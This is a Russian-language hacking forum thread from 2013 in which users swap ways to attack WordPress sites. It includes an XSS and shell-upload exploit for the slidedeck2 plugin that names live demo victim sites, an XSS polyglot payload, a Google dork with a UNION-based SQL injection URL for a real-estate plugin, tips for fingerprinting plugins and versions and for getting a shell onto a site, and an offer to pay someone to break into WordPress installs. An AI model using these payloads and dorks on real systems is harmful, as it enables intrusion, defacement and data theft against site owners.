HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.01.2013, 22:15
pharm_all
Познающий
Регистрация: 10.09.2009
Сообщений: 40
С нами: 8772921

Репутация: 1
По умолчанию

Intelligently guesses hash values in order to extract Wordpress password hashes via W3 Total Cache.


+# This affects W3 Total Cache
 
Ответить с цитированием

  #2  
Старый 21.02.2013, 22:21
3ak.aT
Новичок
Регистрация: 01.12.2011
Сообщений: 0
С нами: 7604246

Репутация: 0
По умолчанию

Wordpress Plugins - slidedeck2 pro XSS/File Upload Vulnerability

Код HTML:
# Author => Zikou-16
# Download plugin : http://wordpress.org/extend/plugins/slidedeck2/

#=> Exploit Info :
------------------
# The attacker can inject HTML codes & inject a simple file uploader to upload shell
------------------

------------------
#=> XSS
------------------
http://[target]/[path]/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html

inj3ct u'r HTML codes in (Text) then click Copy To Clipboard... 

screenshot #=> http://i49.tinypic.com/1zgqngx.png

------------------
#=> Shell Upload
------------------

http://[target]/[path]/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html

inj3ct u'r simple file uploader & upload u'r shell

screenshot #=> http://i45.tinypic.com/1426mhg.jpg

------------------
#=> Demos 
------------------

http://thevillagevenue.com/wordpress/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html

http://dreamland.com.pk/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html

http://oldsouthpawn.com/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
Судя по описанию автора можно вставить простой HTML код загрузки файла с компа, но есть одно большое НО! Без исполняющего .php файла на сервере никакая HTML форма загрузки не сможет залить файл на сервак.

Вопрос: какие идеи?

© Источник
 
Ответить с цитированием

  #3  
Старый 27.03.2013, 21:23
Limbaro
Новичок
Регистрация: 25.10.2011
Сообщений: 0
С нами: 7657526

Репутация: 0
По умолчанию

wordpress

Если нарушаю правила, прошу админа не наказывать строго, просто очень нужно не знаю где запостить.. Вопрос состоит вот в чем. Настроил 2 вордпресса, слышал тут есть умельцы, которые щелкают их как семечки. Кто сможет получить доступ хоть на 1 из моих WP плачу 100 wmz (или обговорим на большее).. прошу проявить лояльность и не удалять этот топик, никаких данных тут не кидаю все вопросы в аську...

icq: 640831391
 
Ответить с цитированием

  #4  
Старый 25.04.2013, 02:12
Mastahh
Новичок
Регистрация: 24.04.2013
Сообщений: 1
С нами: 6869846

Репутация: 0
По умолчанию

Есть сайт Wordpress 3.4.1 - как узнать какие плагины стоят?

Есть папка uploads, где видно все файлы. Значит где то есть uploader?
 
Ответить с цитированием

  #5  
Старый 09.05.2013, 18:53
strelok20094
Познающий
Регистрация: 26.03.2011
Сообщений: 81
С нами: 7964246

Репутация: 2
По умолчанию

Цитата:
Сообщение от Mastahh  
Есть сайт Wordpress 3.4.1 - как узнать какие плагины стоят?
Есть папка uploads, где видно все файлы. Значит где то есть uploader?
Просканируй сайт этой прогой Web Vulnerability Scanner 8

там будет папка wp-content/plugins Так вот в ней и лежал плагины
 
Ответить с цитированием

  #6  
Старый 31.05.2013, 14:27
Unknowhacker
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами: 6825206

Репутация: 24
По умолчанию

Версия 3.5 и 3.5.1

Чтобы воспользоваться ниже упомянутой уязвимостью нужно иметь права редактора или администратора, то есть права на размещение/редактирование новостей. При размещении в тело сообщения JavaScript кода:

Код:
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ">'>alert(String.fromCharCode(88,83,83))
после чего и срабатывает уязвимость. Таким образом мы видим, что злоумышленник может получить возможность атаковать всех пользователей, которые просто зайдут почитать размещённую новость или статью. При определенных манипуляциях с кодом можно также заразить массу посетителей сайта вирусом, перенаправляя их на вредоносный сайт.
 
Ответить с цитированием

  #7  
Старый 02.06.2013, 00:44
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами: 8258006

Репутация: 25


По умолчанию

все облазил) никак не получается шелл впихнуть на wp 3.3. при загрузке плагинов\тем просит FTP доступ напомнить ему. редактор не помогает. Есть варианты какие нибудь?

EDIT

Все мои попытки загружать медиафайлы отображаются в графе Медиафайлы (с пометкой что не прикреплены или еще что нибудь) жмем редактировать -> узнаем путь -> профит. может пригодится кому нибудь)
 
Ответить с цитированием

  #8  
Старый 27.06.2013, 14:12
psihoz26
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами: 8142806

Репутация: 324


По умолчанию

WordPress marker_listings.xml SQL injection

Google dork:

Код:
inurl:"wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id="
Vulnerable script:

Код:
h**p://WordPress.eX/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,COLUMN_NAME,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+FROM+INFORMATION_SCHEMA.COLUMNS+--+
 
Ответить с цитированием

  #9  
Старый 27.08.2013, 22:42
J_thief
Новичок
Регистрация: 12.08.2013
Сообщений: 16
С нами: 6711446

Репутация: 0
По умолчанию

Ребят, как эксплуатировать эту уязвимость, WordPress WP-Print Plugin CSRF

Сам плагин, версии 2.31
 
Ответить с цитированием

  #10  
Старый 16.09.2013, 00:08
psihoz26
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами: 8142806

Репутация: 324


По умолчанию

очередная возможность узнать версию вордпресс

файл redame.html в корневой папке с блогом

пример

http://www.lasalle.edu/readme.html

http://www.blackandabroad.com/readme.html
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Веб-уязвимости 361 24.10.2019 10:25
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Веб-уязвимости 43 04.02.2012 20:33
[ Обзор уязвимостей SLAED CMS ] _kREveDKo_ Веб-уязвимости 20 01.11.2009 14:28
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ nike57 Уязвимости Mail-сервис 4 05.05.2006 22:03
Статья обзор уязвимостей бесплатных почтовых сервисов markel Уязвимости Mail-сервис 3 12.09.2005 10:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.